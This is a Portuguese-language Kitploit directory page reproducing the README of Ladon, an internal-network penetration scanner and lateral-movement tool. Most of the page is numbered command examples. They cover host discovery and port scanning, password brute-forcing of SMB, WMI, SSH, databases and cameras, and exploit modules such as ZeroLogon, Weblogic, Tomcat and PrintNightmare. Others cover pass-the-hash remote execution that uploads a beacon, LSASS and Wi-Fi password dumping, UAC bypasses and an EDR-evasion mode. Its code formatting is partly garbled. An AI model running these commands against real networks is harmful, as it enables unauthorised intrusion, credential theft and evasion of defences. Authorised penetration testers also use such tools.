Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ladon — Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange | Kitploit
Ferramentas/GitHubGitHub/k8gege/ladon
Privilege EscalationReconnaissanceVulnerability ScannersNetwork MappingPassword AttacksPort ScanningExploitationLateral MovementInformation GatheringWeb SecurityPenetration TestingSubdomain Enumeration
5.3k882há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubk8gege/ladon

Ladon

Ver RepositórioSite

Sobre

Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange

Compartilhar

Ladon Scanner de Penetração em Rede Interna de Grande Porte Carregamento na Memória do Plugin Cobalt Strike

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Introdução ao Programa

Ladon é um scanner de penetração em rede interna de grande porte, ferramenta de penetração em domínio e movimento lateral, módulo PowerShell, plugin Cobalt Strike, carregamento na memória, scan sem arquivos. Inclui varredura de portas, identificação de serviços, detecção de ativos de rede, auditoria de senhas, detecção de vulnerabilidades de alto risco, exploração de vulnerabilidades, leitura de senhas e GetShell com um clique, suporta varredura em lote de segmentos A/B/C e varredura entre segmentos de rede, suporta varredura de listas de URLs, hosts, domínios, etc. A versão 12.2 possui 262 módulos de função integrados, módulo de detecção de ativos de rede com mais de 30 protocolos (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) e métodos para obter rapidamente IPs de hosts ativos, nomes de computador, grupos de trabalho, recursos compartilhados, endereços de placa de rede, versão do sistema operacional, sites, subdomínios, middleware, serviços abertos, roteadores, switches, bancos de dados, impressoras e outras informações da rede alvo, detecção de vulnerabilidades de alto risco 16+ incluindo Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, série Struts2, Printer, etc., auditoria de senhas 25+ incluindo bancos de dados (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar, etc., execução remota de comandos inclui (smbexec/wmiexe/psexec/atexec/sshexec/webshell), módulo de identificação de impressão digital Web pode identificar 135+ (aplicações Web, middleware, tipos de script, tipos de página), etc., elevação de privilégio local 21+ incluindo SweetPotato\BadPotato\EfsPotato\BypassUAC, plugins POC altamente customizáveis suportam plugins escritos em .NET assembly, DLL (C#/Delphi/VC), PowerShell, etc., suporta chamar qualquer programa externo ou comando em lote através de configuração INI, gerador EXP pode gerar POC/EXP de vulnerabilidade com um clique para expandir rapidamente a capacidade de varredura, Ladon suporta carregamento na memória do plugin Cobalt Strike, scan sem arquivos para movimento lateral rápido na rede interna.

Download do Ladon```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### Uso Simples

Embora o Ladon seja rico em funcionalidades, seu uso é muito simples, qualquer pessoa pode começar facilmente<br>
Apenas um ou dois parâmetros permitem usar 90% das funcionalidades, um módulo equivale a uma nova ferramenta.

### Ambiente de Execução

#### Windows

O Ladon pode ser usado em sistemas Windows com .NET 2.0 ou superior (Win7 e posteriores já possuem .NET nativo)<br>
Como Cmd, PowerShell, Cmd de controle remoto, WebShell, etc., e também carregamento em memória no Cobalt Strike<br>
O Ladon.ps1 é perfeitamente compatível com Win7-Win11/2025 PowerShell, sem verificar versão, carregamento remoto sem arquivo para penetração.

#### LadonGo Multiplataforma suporta Linux, Mac, Arm, MIPS

Todas as plataformas: Linux, MacOS, Windows, roteadores, dispositivos de rede e outros sistemas operacionais<br>
https://github.com/k8gege/LadonGo

### Condições Incomuns

Na prática, nem tudo é tão tranquilo, algumas redes internas ficam muito lentas após encaminhamento ou não é possível encaminhar, sendo necessário enviar a ferramenta para o alvo<br>
Alguns cavalos de Troia podem demorar horas para enviar programas de 2-3 MB ou até não conseguir enviar, quanto mais dezenas de MB em Python<br>
O Ladon é desenvolvido em C#, o tamanho do programa é muito pequeno, cerca de 500 KB, mesmo que o cavalo não seja bom, ainda pode enviar um programa de 500 KB<br>
Se ainda não funcionar, pode carregar remotamente na memória via PowerShell, algo que programas grandes compilados em Python ou Go não conseguem igualar.

### Filosofia

Serviço completo, fornecendo ao usuário uma ferramenta de varredura simples, rica em funcionalidades e altamente flexível.

### Características

Baixo tráfego de varredura<br>
Tamanho pequeno do programa<br>
Funcionalidades ricas e poderosas<br>
Programa simples e fácil de usar<br>
Plugins suportam múltiplas linguagens<br>
Multiplataforma (Win/Kali/Ubuntu) etc.<br>
Suporte a plugins no Cobalt Strike<br>
Suporte a penetração sem arquivo via PowerShell<br>
Gerador de Exp pode gerar PoC com um clique<br>
Múltiplas versões adequadas para vários ambientes.

### Funcionalidades dos Parâmetros do Programa

1  Suporte a varredura de IP específico<br>
2  Suporte a varredura de domínio específico<br>
3  Suporte a varredura de nome de máquina específico<br>
4  Suporte a varredura de segmento C específico (ip/24)<br>
5  Suporte a varredura de segmento B específico (ip/16)<br>
6  Suporte a varredura de segmento A específico (ip/8)<br>
7  Suporte a varredura de URL específica<br>
8  Suporte a varredura em lote de IPs (ip.txt)<br>
9  Suporte a varredura em lote de segmentos C (ip24.txt)<br>
10 Suporte a varredura em lote de segmentos C (ipc.txt)<br>
11 Suporte a varredura em lote de segmentos B (ip16.txt)<br>
12 Suporte a varredura em lote de URLs (url.txt)<br>
13 Suporte a varredura em lote de domínios (domain.txt)<br>
14 Suporte a varredura em lote de nomes de máquina (host.txt)<br>
15 Suporte a varredura em lote de segmentos de país (cidr.txt)<br>
16 Suporte a lista de strings em lote (str.txt)<br>
17 Suporte a lista de contas e senhas de hosts (check.txt)<br>
18 Suporte a lista de usuários e senhas (userpass.txt)<br>
19 Suporte a varredura de segmento C em intervalo específico<br>
20 Suporte a carregamento de DLL personalizada via parâmetro (apenas C#)<br>
21 Suporte a carregamento de EXE personalizado via parâmetro (apenas C#)<br>
22 Suporte a carregamento de arquivo de configuração INI personalizado via parâmetro<br>
23 Suporte a carregamento de PowerShell personalizado via parâmetro<br>
24 Suporte a programas personalizados (comandos do sistema ou programas de terceiros, ou seja, programas ou scripts desenvolvidos em qualquer linguagem)<br>
25 Plugins (suportam múltiplas linguagens: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Suporte a Cobalt Strike (varredura da rede interna alvo ou varredura de alvos externos via jump host na linha de comando do beacon)<br>
27 Suporte a varredura de IP no formato CIDR, como 100.64.0.0/10, 192.168.1.1/20, etc.<br>
28 Configuração INI suporta quebra de senha de programas personalizados

### Tutorial Rápido de Uso

Tutorial rápido do Ladon Documentação completa: http://k8gege.org/Ladon <br>
Documentação das funções dos módulos Excel: http://k8gege.org/Ladon/wiki.xlsx <br>
Suporte a carregamento em memória via Cmd, Cobalt Strike, PowerShell, etc.<br>
Versão Windows: .Net, Cobalt Strike, PowerShell<br>
Versão para todos os sistemas: Go (multiplataforma), Python (teoricamente multiplataforma)<br>
PS: Study é conveniente para aprendizado local, para funcionalidades completas use CMD.

### Varredura BypassEDR

A varredura padrão é muito rápida, mas alguns WAFs ou EDRs têm defesas fortes<br>
Mesmo configurando alguns threads, pode parar de funcionar após cerca de 20 minutos<br>
bypassEDR simula acesso humano, contornando estratégias de detecção de velocidade<br>
A velocidade de varredura é mais lenta, não use se você é um apressado que só pensa em velocidade.```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

Módulos relacionados à quebra de senha atualmente não suportam o parâmetro bypassEDR

001 Varredura de thread personalizada

Exemplo: Verificar se o segmento alvo 10.1.2 possui a vulnerabilidade MS17010
Thread única:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

Sob proteção de alta intensidade, defina os threads de varredura mais baixos, F single-thread
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 Varredura de Proxy Socks5
Exemplo: Usando 8 threads para verificar se o alvo no segmento 10.1.2 possui a vulnerabilidade MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

详见:http://k8gege.org/Ladon/proxy.html

PS:As ferramentas de proxy não suportam Socks5, portanto, é necessário adicionar o parâmetro noping para escanear.
Seja Frp ou outras ferramentas similares, o principal é que ferramentas como Proxifier não suportam o protocolo ICMP.
Porque o Ladon primeiro usa ICMP para detectar hosts ativos por padrão, antes de usar os módulos correspondentes para teste.
Portanto, em ambiente de proxy, é necessário desabilitar o escaneamento ping, já que o ping do sistema usa o protocolo ICMP.

003 Escaneamento de sub-rede / Escaneamento em lote

Formato CIDR: não apenas /24/16/8 (todos)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
Formato de letras: apenas seções C, B, A, ordenação sequencial```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 Especificar faixa de IP, varredura de sub-rede

Detecção ICMP de hosts ativos no intervalo 50-200```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### Varredura ICMP de hosts ativos de 1.30 a 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

TXT格式

004 Escaneamento em lote ICMP de hosts ativos na lista de segmento C```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 Varredura em lote ICMP de hosts ativos na lista do segmento B```Bash
Ladon ip16.txt ICMP
006 Varredura ICMP em lote de lista CIDR (ex.: bloco de IP de um país)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 ICMP varredura em lote de nomes de domínio para verificar se estão ativos```Bash
Ladon domain.txt ICMP
008 Verificação ICMP em lote de máquinas ativas usando nomes de host ou nomes de máquina```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS identificação em lote de CMS, Banner, certificados SSL, títulos, capaz de identificar CMS desconhecidos, roteadores, impressoras, dispositivos de rede, câmeras, etc.```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 Detecção em lote de versões, vulnerabilidades e senhas fracas de roteadores DrayTek```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 Decodificação em lote de senhas Base64```Bash
Ladon str.txt DeBase64

Varredura de ativos, reconhecimento de impressões digitais, identificação de serviços, hosts ativos, varredura de portas

image

012 Varredura ICMP de hosts ativos (mais rápida)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping para detectar hosts ativos (chama o comando Ping do sistema, exibe ms, ttl e outras informações)```Bash
Ladon 192.168.1.8/24 Ping

Se você acha que o comando ping responder significa que o host está ativo, pode usar este comando em lote

014 Descoberta de hosts ativos por múltiplos protocolos (IP, nome da máquina, MAC/domínio, fabricante/versão do sistema)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 Identificação do sistema operacional por múltiplos protocolos (IP, nome da máquina, versão do SO, serviços abertos)```Bash
Ladon 192.168.1.8/24 OsInfo
016 Detecção de host multi-NIC OXID```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 Detecção DNS de host com múltiplas placas de rede```Bash
Ladon 192.168.1.8/24 DnsInfo
018 varredura multiprotocolo de IPs de hosts ativos```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 Escaneamento de vulnerabilidade SMB MS17010 (IP, nome da máquina, ID da vulnerabilidade, versão do sistema operacional)```Bash
Ladon 192.168.1.8/24 MS17010
020 Detecção de vulnerabilidade SMBGhost CVE-2020-0796 (IP, Nome da máquina, ID da vulnerabilidade, Versão do sistema operacional)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 Escaneamento de título Web Banner Para informações mais completas, utilize o módulo WhatCMS```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 Escanear URLs e domínios de sites na sub-rede C```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 Varredura de URLs e domínios de sites no segmento C```Bash
Ladon 192.168.1.8/24 SameWeb
024 Digitalizar subdomínios, domínios de segundo nível```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 IP de resolução de domínio, IP de resolução de nome de host```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 Resolução em lote de IP de nomes de domínio, resolução em lote de IP de nomes de host```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 Resolução em lote de nomes de domínio e host - resultado apenas IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 Consulta DNS de máquinas e IPs no domínio (condição: dentro do domínio, especificar IP do controlador de domínio)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 Consultar máquinas e IPs no domínio (condição: dentro do domínio)
Ladon GetDomainIP

##### 028 Escaneamento de portas do segmento C, escaneamento de porta específica```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 Escaneamento de segmento C WEB e identificação de CMS (800+ reconhecimento de impressões digitais Web)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### Escaneamento de Dispositivos Cisco```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 Enumerar hosts de banco de dados Mssql (IP do banco de dados, nome da máquina, versão do SQL)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 Enumeração de recursos compartilhados de rede 	(Domínio, IP, Nome do Host\Caminho Compartilhado)```Bash
Ladon EnumShare
033 Escanear servidor LDAP (detectar controlador de domínio)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 Digitalizar servidor FTP e identificar versão```Bash
Ladon 192.168.1.8/24 FtpInfo

Ataque de força bruta/Autenticação de rede/Senha fraca/Quebra de senha/Banco de dados/Backend do site/Portal de login/Login do sistema

image Quebra de senha detalhada consulte SSH: http://k8gege.org/Ladon/sshscan.html

035 445 porta SMB quebra de senha (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 porta 135 Wmi força bruta de senha(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 Porta 389, Servidor LDAP, Quebra de senha de domínio AD (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 Porta 5985 Brute force de senha WinRM (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 Porta 445 SMB NTLM HASH brute force (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 Porta 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 Porta 22 SSH brute force de senha (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 Porta 1433 Brute-force de senha do banco de dados Mssql```Bash
Ladon 192.168.1.8/24 MssqlScan
043 Porta 1521 Força bruta de senha do banco de dados Oracle```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
O banco de dados Oracle é especial; forçar apenas o banco ORCL pode perder muitas permissões<br>
Veja: http://k8gege.org/Ladon/OracleScan.html<br>

##### 044 Porta 3306 - Força bruta de senha do banco de dados Mysql```Bash
Ladon 192.168.1.8/24 MysqlScan
045 Porta 7001 - Força bruta de senha do backend do Weblogic```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 Porta 5900 – Força bruta de senha do VNC (Área de Trabalho Remota)```Bash
Ladon 192.168.1.8/24 VncScan
047 Porta 21 Ataque de força bruta de senha do servidor FTP```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 Porta 8080 Tomcat brute force de senha de login do backend```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Força bruta de senha de autenticação básica na porta web 401```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 Porta 139 Protocolo NetBIOS Força Bruta de Senha Windows```Bash
Ladon 192.168.1.8/24 NbtScan
053 Porta 5985 Protocolo Winrm Quebra de senhas Windows```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 Quebra de senha de câmera de rede (senhas padrão integradas)```Bash
Ladon 192.168.1.8/24 DvrScan

Detecção de vulnerabilidades/Poc

image

055 Detecção de vulnerabilidades SMB (CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 Detecção de vulnerabilidade SMBGhost CVE-2020-0796		911 reservado```Bash
Ladon 192.168.1.8/24 SMBGhost
057 Detecção de vulnerabilidades do Weblogic (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 Detecção de backdoor do PhpStudy (phpstudy 2016/phpstudy 2018)  10.9 removido, 911 mantido```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 Detecção de vulnerabilidade ActiveMQ(CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 Detecção de vulnerabilidade do Tomcat (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 Detecção de vulnerabilidades do Struts2 (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc CVE-2020-8515 Detecção de vulnerabilidades, Detecção de versão Draytek, Detecção de senha fraca```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
FortiGate CVE-2024-55591 detecção de vulnerabilidade RCE não autorizado```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### Exploração/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 Weblogic Exploração(CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 Exploração de vulnerabilidade do Tomcat(CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 Gerador de injeção DLL universal para execução de CMD em vulnerabilidades 0day do Windows (DLL apenas 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 Vulnerabilidade 0-day do Microsoft IE/Office```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 Exploit de Execução Remota de Comandos```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 Penetração de Domínio ZeroLogon CVE-2020-1472 Elevação de Privilégio no Controlador de Domínio (Senha Vazia)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 Vulnerabilidade de serialização do Exchange (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 Exploração de loop ForExec (Win10 EternalDarkness CVE-2020-0796, sair com sucesso para evitar tela azul no alvo)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### Download de arquivos, transferência de arquivos

##### 071 Transferência de arquivos na rede interna Download HTTP Download HTTPS Download MSF```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 Transferência de arquivos na intranet Download Ftp```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### Criptografia/Descriptografia (HEX/Base64)

##### 073 Hex Criptografia e Descriptografia```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Criptografia e Descriptografia Base64```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### Sniffing de rede

##### 075 Sniffing de senha FTP (vincular IP local, sniffing automático na sub-rede C)
Máquinas multi-interface, sniffing dos IPs da sub-rede C correspondente```Bash
Ladon FtpSniffer 192.168.1.5
076 Sniffing de senhas HTTP (vinculando IP local, sniffing automático do segmento C) Máquinas com múltiplas placas de rede, sniffing do IP do segmento C correspondente```Bash

Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 farejamento de rede```Bash
Ladon Sniffer

Leitura de Senhas

078 Ler senha de site IIS, caminho do site```Bash

Ladon IISpwd

root@kitploit:~
##### 079 Ler senhas de WIFI conectadas```Bash
Ladon WifiPwd
080 Ler senha FTP do FileZilla```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 Ler Hash do sistema, senha VPN, DPAPI-Key  10.9 Remoção```Bash
Ladon CVE-2021-36934  
082 DumpLsass senha da memória (mimikatz em texto claro) limitado a versões anteriores a 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### Coleta de Informações

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API Ver Usuário Atual```Bash
Ladon w
Ladon whoami
083 Obter IP da intranet local e IP externo```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 Obter PCname GUID CPUID DiskID endereço MAC```Bash
Ladon GetID
085 Ver arquivos acessados recentemente pelo usuário```Bash

Ladon Recent

root@kitploit:~
##### 086 Visualização de registros de uso de USB (nome USB, marca USB, informações do caminho)```Bash
Ladon UsbLog
087 Detectar backdoor (itens de inicialização do registro, sequestro de DLL)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 Detalhes do processo (caminho do programa, bits, parâmetros de inicialização, usuário)```Bash
Ladon EnumProcess
Ladon Tasklist
089 Obter argumentos da linha de comando```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 Obter informações básicas de penetração```Bash
Ladon GetInfo
Ladon GetInfo2
091 .NET & PowerShell versão```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 versão de runtime & ambiente de compilação```Bash
Ladon Ver
Ladon Version
093 Versão de runtime & Ambiente de compilação & Lista de software instalado```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 Visualizar informações de proxy do IE```Bash
Ladon QueryProxy
095 DirList listar diretórios + informações básicas de penetração
Padrão lista todo o disco
```Bash

Ladon DirList

root@kitploit:~
###### Especificar letra de unidade ou diretório```Bash
Ladon DirList c:\   
096 QueryAdmin Visualizar usuários administradores```Bash

Ladon QueryAdmin

root@kitploit:~
##### 097 Ver pipes nomeados locais```Bash
Ladon GetPipe
098 RdpLog ver registros de conexão 3389```Bash

Ladon RdpLog

root@kitploit:~
### Execução remota (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### Porta 099/445 comando de execução remota PSEXEC criptografado (interativo)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 135端口 WmiExec execução remota de comandos (não interativo)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 101 445 portas AtExec execução remota de comando (não interativa)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 Porta 22 SshExec Execução Remota de Comando (Não Interativo)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 Execução remota de comandos JspShell (não interativa) removida na versão 9.3.0
Usage: Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 Comando de execução remota do WebShell (não interativo) removido na versão 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### Portas 105 e 135 WmiExec2 execução remota de comandos com suporte a HASH (não interativo) e suporte a upload de arquivos```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 445 porta SmbExec Ntlm-Hash execução remota de comandos não interativa (sem retorno)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec Execução Remota de Comando sem Retorno (Suporta Privilégio System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Elevação e redução de privilégios

image

108 whoami verificar as permissões e privilégios do usuário atual```Bash

Ladon whoami

root@kitploit:~
##### 109  6 tipos de BypassUAC de lista de permissões (após 8.0) Win7-Win10  Removido na versão 10.8, apenas mantido no 911
Uso: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2: contornar UAC para execução, suporta Win7-Win10

10.8 versão removida, apenas 911 mantido.```Bash Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) exploit de escalada de privilégios da vulnerabilidade de impressora```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool vulnerabilidade de impressora escalada de privilégios EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem Elevação de privilégio System e execução de CMD```Bash
Ladon GetSystem cmd.exe
114 Executar CMD com token copiado (por exemplo, rebaixar privilégio de system para o usuário atual do exploer)```Bash

